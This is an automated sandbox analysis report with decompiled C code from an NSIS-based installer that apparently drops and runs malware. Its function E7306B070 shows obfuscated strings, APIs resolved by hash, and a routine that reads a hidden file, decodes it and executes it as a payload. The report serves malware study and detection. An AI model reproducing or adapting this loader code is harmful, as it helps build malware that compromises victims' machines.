						E0040587F(0x409c40);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040589E(0x409c40, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404EB3(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42eca8;
						goto L32;
					} else {
						E00405BC7(0x40a440, 0x42f000);
						E00405BC7(0x42f000, 0x409c40);
						E00405BE9(_t75, 0x40a440, 0x409c40, "C:\Users\Albus\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405BC7(0x42f000, 0x40a440);
						_t62 = E00405488("C:\Users\Albus\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42eca8 =  &( *0x42eca8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c40);
								_push(0xfffffffa);
								E00404EB3();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404EB3(0xffffffea,  *(_t85 - 0xc));
				 *0x42ecd4 =  *0x42ecd4 + 1;
				_t43 = E00402E8E( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
				 *0x42ecd4 =  *0x42ecd4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffee);
					} else {
						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffe9);
						lstrcatA(0x409c40,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c40);
					E00405488();
					goto L29;
				}
				goto L33;
			}
















              0x00401751
              0x00401758
              0x00401761
              0x00401764
              0x00401767
              0x0040176c
              0x00401774
              0x00401790
              0x00401776
              0x00401776
              0x00401777
              0x00401777
              0x00401796
              0x004017a0
              0x004017a0
              0x004017a4
              0x004017a7
              0x004017ac
              0x004017ae
              0x004017b0
              0x004017b5
              0x004017b5
              0x004017c0
              0x004017c0
              0x004017d1
              0x004017d3
              0x004017d3
              0x004017d4
              0x004017d4
              0x004017d7
              0x004017da
              0x004017dd
              0x004017dd
              0x004017e4
              0x004017f3
              0x004017f8
              0x004017fb
              0x004017fe
              0x00000000
              0x00000000
              0x00401800
              0x00401803
              0x0040185d
              0x00401862
              0x004015a8
              0x0040268f
              0x0040268f
              0x004028be
              0x004028c1
              0x004028c1
              0x00000000
              0x00401805
              0x0040180b
              0x00401816
              0x00401823
              0x0040182e
              0x00401844
              0x00401844
              0x00401847
              0x00000000
              0x0040184d
              0x0040184d
              0x0040184e
              0x0040186b
              0x004028c7
              0x004028c7
              0x004028c7
              0x00401850
              0x00401850
              0x00401851
              0x00401492
              0x00402241
              0x00402241
              0x00402241
              0x0040184e
              0x00401847
              0x004028c9
              0x004028cd
              0x004028cd
              0x0040187b
              0x00401880
              0x0040188e
              0x00401893
              0x00401899
              0x0040189d
              0x0040189f
              0x004018a7
              0x004018b3
              0x004018a1
              0x004018a1
              0x004018a5
              0x00000000
              0x00000000
              0x004018a5
              0x004018bc
              0x004018c2
              0x004018c4
              0x00000000
              0x004018ca
              0x004018ca
              0x004018cd
              0x004018e5
              0x004018cf
              0x004018d2
              0x004018db
              0x004018db
              0x004018ea
              0x004018ef
              0x0040223c
              0x00000000
              0x0040223c
              0x00000000

              APIs
              • lstrcatA.KERNEL32(00000000,00000000,TclpOwkq,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
              • CompareFileTime.KERNEL32(-00000014,?,TclpOwkq,TclpOwkq,00000000,00000000,TclpOwkq,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                • Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,qghopzytl Setup,NSIS Error), ref: 00405BD4
                • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041A276,74EC110C,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041A276,74EC110C,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041A276,74EC110C), ref: 00404F0F
                • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F47
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F61
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F6F
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
              • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsd99E0.tmp$C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll$TclpOwkq
              • API String ID: 1941528284-2471865927
              • Opcode ID: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
              • Instruction ID: c8ecff54efbd1983964958a71a4b78ec9a68474d29a8073c081a3edbe3f43163
              • Opcode Fuzzy Hash: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
              • Instruction Fuzzy Hash: 8541B631904514BBCB107BA6CC45DAF3678EF01329F60823BF521F11E1D63CAA419EAE
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405375, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405375(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40735c;
				_v36.Group = 0x40735c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40734c;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







              0x00405380
              0x00405384
              0x00405387
              0x0040538d
              0x00405391
              0x00405395
              0x0040539d
              0x004053a4
              0x004053aa
              0x004053b1
              0x004053b8
              0x004053c0
              0x004053c2
              0x00000000
              0x004053c2
              0x004053cc
              0x004053d3
              0x004053e9
              0x00000000
              0x00000000
              0x00000000
              0x004053eb
              0x004053ef

              APIs
              • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
              • GetLastError.KERNEL32 ref: 004053CC
              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053E1
              • GetLastError.KERNEL32 ref: 004053EB
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ErrorLast$CreateDirectoryFileSecurity
              • String ID: C:\Users\Public$Ls@$\s@
              • API String ID: 3449924974-3509358640
              • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
              • Instruction ID: 9862b429919ab471ad7b2dc8692991af43e8f75a2b46e14c68af8680499b7529
              • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
              • Instruction Fuzzy Hash: 78010C71D14219DADF019BA0DC447EFBFB8EB04354F00453AE904B6180E3B89614CFA9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405EE9, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405EE9(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








              0x00405f00
              0x00405f09
              0x00405f0b
              0x00405f0b
              0x00405f0f
              0x00405f21
              0x00405f1b
              0x00405f1b
              0x00405f1b
              0x00405f25
              0x00405f39
              0x00405f4d
              0x00405f54

              APIs
              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F00
              • wsprintfA.USER32 ref: 00405F39
              • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: DirectoryLibraryLoadSystemwsprintf
              • String ID: %s%s.dll$UXTHEME$\
              • API String ID: 2200240437-4240819195
              • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
              • Instruction ID: fa246daef39c5d1266dc05b53ca8af7bf1dea281c1fa5b10d5a6498bb1fbd0ec
              • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
              • Instruction Fuzzy Hash: AAF0F63094050A6BDB14AB64DC0DFFB365CFB08305F1404BAB646E20C2E678E9158FAD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004058CD, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004058CD(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








              0x004058d1
              0x004058d7
              0x004058d8
              0x004058d8
              0x004058d9
              0x004058e0
              0x004058ea
              0x004058f7
              0x004058fa
              0x00405902
              0x00000000
              0x00000000
              0x00405906
              0x00000000
              0x00000000
              0x00405908
              0x00000000
              0x00405908
              0x00000000

              APIs
              • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\vbc.exe" ,00403128,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004058E0
              • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 004058FA
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CountFileNameTempTick
              • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$nsa
              • API String ID: 1716503409-1498418707
              • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
              • Instruction ID: 53182d5486abb24f79a58d6e85a6b3ecacc509e50e1b88e8db4ee69f85448782
              • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
              • Instruction Fuzzy Hash: E8F0A736348258BBD7115E56DC04B9F7F99DFD1760F10C027FA049A280D6B09A54C7A9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 7306B070, Relevance: 7.7, APIs: 5, Instructions: 193fileCOMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E7306B070() {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				char _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				long _v120;
				short _v1160;
				short _t82;
				short _t83;
				short _t84;
				short _t85;
				short _t86;
				short _t87;
				short _t88;
				short _t89;
				short _t90;
				short _t91;
				short _t92;
				short _t107;
				short _t108;
				short _t109;
				short _t110;
				short _t111;
				short _t112;
				short _t113;
				short _t114;
				short _t115;
				short _t116;
				short _t117;
				short _t118;
				short _t119;
				short _t120;
				short _t121;
				void* _t129;
				signed int _t130;
				void* _t131;
				int _t133;
				void* _t136;

				_t82 = 0x53;
				_v44 = _t82;
				_t83 = 0x68;
				_v42 = _t83;
				_t84 = 0x6c;
				_v40 = _t84;
				_t85 = 0x77;
				_v38 = _t85;
				_t86 = 0x61;
				_v36 = _t86;
				_t87 = 0x70;
				_v34 = _t87;
				_t88 = 0x69;
				_v32 = _t88;
				_t89 = 0x2e;
				_v30 = _t89;
				_t90 = 0x64;
				_v28 = _t90;
				_t91 = 0x6c;
				_v26 = _t91;
				_t92 = 0x6c;
				_v24 = _t92;
				_v22 = 0;
				_v12 = _v12 & 0x00000000;
				_v8 = E7306B737();
				_v84 = E7306B7E6(_v8, 0x7fc01dae);
				_v116 = E7306B7E6(_v8, 0xff7f721a);
				_v80 = E7306B7E6(_v8, 0x7fd6a366);
				_v88 = E7306B7E6(_v80( &_v44), 0x7f5a653a);
				_v112 = E7306B7E6(_v8, 0x7f91a078);
				_v92 = E7306B7E6(_v8, 0x7fe63623);
				_v96 = E7306B7E6(_v8, 0x7fbd727f);
				_v100 = E7306B7E6(_v8, 0x7fb47add);
				_v104 = E7306B7E6(_v8, 0x7fe7f840);
				_t146 = _v8;
				_v108 = E7306B7E6(_v8, 0x7fe1f1fb);
				_t107 = 0x39;
				_v76 = _t107;
				_t108 = 0x72;
				_v74 = _t108;
				_t109 = 0x76;
				_v72 = _t109;
				_t110 = 0x73;
				_v70 = _t110;
				_t111 = 0x63;
				_v68 = _t111;
				_t112 = 0x64;
				_v66 = _t112;
				_t113 = 0x30;
				_v64 = _t113;
				_t114 = 0x6a;
				_v62 = _t114;
				_t115 = 0x30;
				_v60 = _t115;
				_t116 = 0x62;
				_v58 = _t116;
				_t117 = 0x34;
				_v56 = _t117;
				_t118 = 0x6e;
				_v54 = _t118;
				_t119 = 0x31;
				_v52 = _t119;
				_t120 = 0x6f;
				_v50 = _t120;
				_t121 = 0x77;
				_v48 = _t121;
				_v46 = 0;
				_v84(0x103,  &_v1160);
				_v88( &_v1160,  &_v76);
				_t129 = CreateFileW( &_v1160, 0x80000000, 7, 0, 3, 0x80, 0);
				_v20 = _t129;
				if(_v20 != 0xffffffff) {
					_t130 = _v96(_v20, 0);
					_v12 = _t130;
					if(_v12 != 0xffffffff) {
						_t131 = VirtualAlloc(0, _v12, 0x3000, 4);
						_v16 = _t131;
						if(_v16 != 0) {
							_t133 = ReadFile(_v20, _v16, _v12,  &_v120, 0);
							if(_t133 != 0) {
								CloseHandle(_v20);
								_v16 = E7306BA78(_t146, _v16, _v12);
								_t136 = E7306BF13(_v16); // executed
								ExitProcess(0);
							}
							return _t133;
						}
						return _t131;
					}
					return _t130;
				}
				return _t129;
			}














































































              0x7306b858
              0x7306b859
              0x7306b85f
              0x7306b860
              0x7306b866
              0x7306b867
              0x7306b86d
              0x7306b86e
              0x7306b874
              0x7306b875
              0x7306b87b
              0x7306b87c
              0x7306b882
              0x7306b883
              0x7306b889
              0x7306b88a
              0x7306b890
              0x7306b891
              0x7306b897
              0x7306b898
              0x7306b89e
              0x7306b89f
              0x7306b8a5
              0x7306b8a9
              0x7306b8b2
              0x7306b8c2
              0x7306b8d2
              0x7306b8e2
              0x7306b8f8
              0x7306b908
              0x7306b918
              0x7306b928
              0x7306b938
              0x7306b948
              0x7306b950
              0x7306b958
              0x7306b95d
              0x7306b95e
              0x7306b964
              0x7306b965
              0x7306b96b
              0x7306b96c
              0x7306b972
              0x7306b973
              0x7306b979
              0x7306b97a
              0x7306b980
              0x7306b981
              0x7306b987
              0x7306b988
              0x7306b98e
              0x7306b98f
              0x7306b995
              0x7306b996
              0x7306b99c
              0x7306b99d
              0x7306b9a3
              0x7306b9a4
              0x7306b9aa
              0x7306b9ab
              0x7306b9b1
              0x7306b9b2
              0x7306b9b8
              0x7306b9b9
              0x7306b9bf
              0x7306b9c0
              0x7306b9c6
              0x7306b9d6
              0x7306b9e4
              0x7306ba00
              0x7306ba03
              0x7306ba0a
              0x7306ba13
              0x7306ba16
              0x7306ba1d
              0x7306ba2d
              0x7306ba30
              0x7306ba37
              0x7306ba4a
              0x7306ba4f
              0x7306ba56
              0x7306ba64
              0x7306ba6a
              0x7306ba71
              0x7306ba71
              0x00000000
              0x7306ba4f
              0x00000000
              0x7306ba37
              0x00000000
              0x7306ba1d
              0x00000000

              APIs
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 7306BA00
              Memory Dump Source
              • Source File: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp Download File
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 5a13b24aadd7caa35aa2ceb1e641975473ff8c2d31c77108ac66d1daa8e782c2
              • Instruction ID: 3f62b94f29e29ca8edf3507c48b81edf411075b46aedd00ec248de0fcc4fae94
              • Opcode Fuzzy Hash: 5a13b24aadd7caa35aa2ceb1e641975473ff8c2d31c77108ac66d1daa8e782c2
              • Instruction Fuzzy Hash: B1716C75E54348EBEB50CBE4EC51BEDBBB5AF48B10F204456E608FA2E4EB704A41DB05
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401F84, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
              Download Yara Rule
              C-Code - Quality: 60%
              			E00401F84(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42ecd8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42eca8 =  *0x42eca8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A29(0xfffffff0);
				 *(_t34 + 8) = E00402A29(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404EB3(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x42f000, 0x40b040, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004035BA(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










              0x00401f84
              0x00401f84
              0x00401f89
              0x00401f90
              0x0040204c
              0x00402197
              0x00402197
              0x004028be
              0x004028c1
              0x004028cd
              0x004028cd
              0x00401f9f
              0x00401fa9
              0x00401fac
              0x00401fbb
              0x00401fbf
              0x00401fc5
              0x00401fc9
              0x00402045
              0x00000000
              0x00402045
              0x00401fcb
              0x00401fd5
              0x00401fd9
              0x0040201d
              0x00401fdb
              0x00401fde
              0x00401fe1
              0x00402011
              0x00401fe3
              0x00401fe6
              0x00401fef
              0x00401ff1
              0x00401ff1
              0x00401fef
              0x00401fe1
              0x00402025
              0x0040203a
              0x0040203a
              0x00000000
              0x00402025
              0x00401faf
              0x00401fb5
              0x00401fb9
              0x00000000
              0x00000000
              0x00000000

              APIs
              • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF
                • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041A276,74EC110C,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041A276,74EC110C,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041A276,74EC110C), ref: 00404F0F
                • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F47
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F61
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F6F
              • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
              • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00401FCF
              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
              • String ID:
              • API String ID: 2987980305-0
              • Opcode ID: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
              • Instruction ID: 67208966b8f2bf19d9e960a2271e5cf927c7fdd1345161600271a48ac580282b
              • Opcode Fuzzy Hash: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
              • Instruction Fuzzy Hash: 48215B36904215EBDF216FA58E4DAAE7970AF44314F20423BFA01B22E0CBBC4941965E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004015B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
              Download Yara Rule
              C-Code - Quality: 87%
              			E004015B3(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A29(0xfffffff0);
				_t13 = E0040574E(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E004056E5(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004053F2(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040540F(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E00405375(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405BC7("C:\\Users\\Albus\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













              0x004015b3
              0x004015ba
              0x004015bd
              0x004015c2
              0x004015c6
              0x004015c8
              0x004015d0
              0x004015d2
              0x004015d4
              0x004015d8
              0x004015db
              0x004015f3
              0x004015f4
              0x004015dd
              0x004015dd
              0x004015e0
              0x00000000
              0x004015eb
              0x004015ec
              0x004015ec
              0x004015e0
              0x004015fb
              0x00401602
              0x0040160f
              0x0040160f
              0x00401604
              0x00401605
              0x0040160d
              0x00000000
              0x00000000
